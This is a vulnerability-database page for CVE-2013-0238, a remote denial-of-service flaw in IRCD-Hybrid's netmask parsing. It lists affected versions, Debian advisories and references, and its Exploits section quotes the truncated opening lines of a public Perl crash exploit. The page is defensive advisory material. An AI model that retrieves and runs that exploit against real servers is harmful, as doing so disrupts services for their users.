Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
5
CVSSv2

CVE-2013-0238

Published: 13/02/2013 Updated: 29/08/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Subscribe to Ircd-hybrid

Vulnerability Summary

The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid prior to 8.0.6 does not properly validate masks, which allows remote malicious users to cause a denial of service (crash) via a mask that causes a negative number to be parsed.

Vulnerable Product Search on Vulmon Subscribe to Product

ircd-hybrid ircd-hybrid 8.0.2

ircd-hybrid ircd-hybrid 8.0.1

ircd-hybrid ircd-hybrid 7.3.0

ircd-hybrid ircd-hybrid

ircd-hybrid ircd-hybrid 8.0.0

ircd-hybrid ircd-hybrid 7.2.0

ircd-hybrid ircd-hybrid 7.2.3

ircd-hybrid ircd-hybrid 7.2.2

ircd-hybrid ircd-hybrid 7.2.1

ircd-hybrid ircd-hybrid 8.0.4

ircd-hybrid ircd-hybrid 8.0.3

ircd-hybrid ircd-hybrid 7.3.1

Vendor Advisories

Debian CVElist Bug Report Logs: ircd-hybrid: CVE-2013-0238 Denial of service vulnerability in hostmask.c:try_parse_v4_netmask()
Debian Bug report logs - #699267 ircd-hybrid: CVE-2013-0238 Denial of service vulnerability in hostmaskc:try_parse_v4_netmask() Package: ircd-hybrid; Maintainer for ircd-hybrid is Dominic Hargreaves <dom@earthli>; Source for ircd-hybrid is src:ircd-hybrid (PTS, buildd, popcon) Reported by: Henri Salo <henri@nervfi> ...
Debian Security Advisories: DSA-2618-1 ircd-hybrid -- denial of service
Bob Nomnomnom reported a Denial of Service vulnerability in IRCD-Hybrid, an Internet Relay Chat server A remote attacker may use an error in the masks validation and crash the server For the stable distribution (squeeze), this problem has been fixed in version 1:722dfsg2-62+squeeze1 For the testing distribution (wheezy), this problem has be ...

Exploits

Exploit DB: ircd-hybrid 8.0.5 - Denial of Service
#!/usr/bin/perl # ircd-hybrid remote denial of service exploit for CVE-2013-0238 # quick and dirty h4x by kingcope # tested against ircd-hybrid-805 centos6 # please modify below in case of buggy code # enjoy! use Socket; srand(time()); $exploiting_nick = "hybExpl" int(rand(10000)); sub connecttoserver() { $bool = "yes"; $iaddr = inet_ ...
Exploit DB: ircd-hybrid 8.0.5 Denial Of Service
ircd-hybrid version 805 on CentOS 6 denial of service exploit ...

References

CWE-20http://www.debian.org/security/2013/dsa-2618http://osvdb.org/89623http://secunia.com/advisories/52106http://secunia.com/advisories/51948http://www.openwall.com/lists/oss-security/2013/01/29/8http://www.securityfocus.com/bid/57610http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699267http://svn.ircd-hybrid.org:8000/viewcvs.cgi/ircd-hybrid/trunk/src/hostmask.c?r1=1786&r2=1785&pathrev=1786http://www.exploit-db.com/exploits/24951http://www.mandriva.com/security/advisories?name=MDVSA-2013:093https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0055https://exchange.xforce.ibmcloud.com/vulnerabilities/81695https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699267https://nvd.nist.govhttps://www.exploit-db.com/exploits/24951/https://www.debian.org/security/./dsa-2618
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4671unauthorizedCVE-2024-4776CVE-2024-3407CVE-2024-26026CVE-2024-32888wirelessCVE-2024-4656template injection
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook